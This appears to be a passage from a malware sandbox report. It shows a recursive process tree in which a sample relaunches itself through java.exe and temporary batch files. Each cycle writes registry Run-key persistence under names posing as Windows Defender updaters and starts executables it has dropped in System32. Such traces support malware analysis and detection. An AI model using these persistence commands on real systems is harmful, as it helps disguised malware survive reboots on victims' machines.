C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"29⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FE2D.tmp\FE2E.tmp\FE2F.bat C:\Windows\system32\java.exe"30⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 131⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f31⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f31⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f31⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f31⤵
- Adds Run key to start application
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"31⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"32⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"31⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"31⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\493.tmp\494.tmp\495.bat C:\Windows\system32\java.exe"32⤵
-
C:\Windows\system32\timeout.exetimeout 133⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f33⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f33⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f33⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f33⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"33⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"34⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"33⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"33⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C60.tmp\CBE.tmp\CBF.bat C:\Windows\system32\java.exe"34⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 135⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f35⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f35⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f35⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f35⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"35⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"36⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"35⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"35⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\146B.tmp\146C.tmp\146D.bat C:\Windows\system32\java.exe"36⤵
-
C:\Windows\system32\timeout.exetimeout 137⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f37⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f37⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f37⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f37⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"37⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"38⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"37⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"37⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1CA5.tmp\1CA6.tmp\1CA7.bat C:\Windows\system32\java.exe"38⤵
-
C:\Windows\system32\timeout.exetimeout 139⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f39⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f39⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f39⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f39⤵
- Adds Run key to start application
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"39⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"40⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"39⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"39⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\24DF.tmp\24E0.tmp\24E1.bat C:\Windows\system32\java.exe"40⤵
-
C:\Windows\system32\timeout.exetimeout 141⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f41⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f41⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f41⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f41⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"41⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"42⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"41⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"41⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2CFA.tmp\2CFB.tmp\2CFC.bat C:\Windows\system32\java.exe"42⤵
-
C:\Windows\system32\timeout.exetimeout 143⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f43⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f43⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f43⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f43⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"43⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"44⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"43⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"43⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3AEE.tmp\3AEF.tmp\3AF0.bat C:\Windows\system32\java.exe"44⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 145⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f45⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f45⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f45⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f45⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"45⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"46⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"45⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"45⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3EF4.tmp\3EF5.tmp\3EF6.bat C:\Windows\system32\java.exe"46⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 147⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f47⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f47⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f47⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f47⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"47⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"48⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"47⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"47⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4309.tmp\430A.tmp\430B.bat C:\Windows\system32\java.exe"48⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 149⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f49⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f49⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f49⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f49⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"49⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"50⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"49⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"49⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4682.tmp\4683.tmp\4684.bat C:\Windows\system32\java.exe"50⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 151⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f51⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f51⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f51⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f51⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"51⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"52⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"51⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"51⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4AB7.tmp\4AB8.tmp\4AB9.bat C:\Windows\system32\java.exe"52⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 153⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f53⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f53⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f53⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f53⤵
- Adds Run key to start application
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"53⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"54⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"53⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"53⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4E6E.tmp\4E6F.tmp\4E70.bat C:\Windows\system32\java.exe"54⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 155⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f55⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f55⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f55⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f55⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"55⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"56⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"55⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"55⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5293.tmp\5294.tmp\5295.bat C:\Windows\system32\java.exe"56⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 157⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f57⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f57⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f57⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f57⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"57⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"58⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"57⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"57⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\565A.tmp\565B.tmp\565C.bat C:\Windows\system32\java.exe"58⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 159⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f59⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f59⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f59⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f59⤵
- Adds Run key to start application
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"59⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"60⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"59⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"59⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5E46.tmp\5E47.tmp\5E48.bat C:\Windows\system32\java.exe"60⤵
-
C:\Windows\system32\timeout.exetimeout 161⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f61⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f61⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f61⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f61⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"61⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"62⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"61⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"61⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\675B.tmp\675C.tmp\675D.bat C:\Windows\system32\java.exe"62⤵
- Drops file in System32 directory
-
C:\Windows\system32\timeout.exetimeout 163⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f63⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f63⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f63⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f63⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"63⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"64⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"63⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"63⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F66.tmp\6F67.tmp\6F68.bat C:\Windows\system32\java.exe"64⤵
-
C:\Windows\system32\timeout.exetimeout 165⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f65⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f65⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f65⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f65⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"65⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"66⤵
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"65⤵
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"65⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\75FB.tmp\75FC.tmp\75FD.bat C:\Windows\system32\java.exe"66⤵
-
C:\Windows\system32\timeout.exetimeout 167⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f67⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f67⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f67⤵
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f67⤵
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"67⤵
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"68⤵
-
-
-
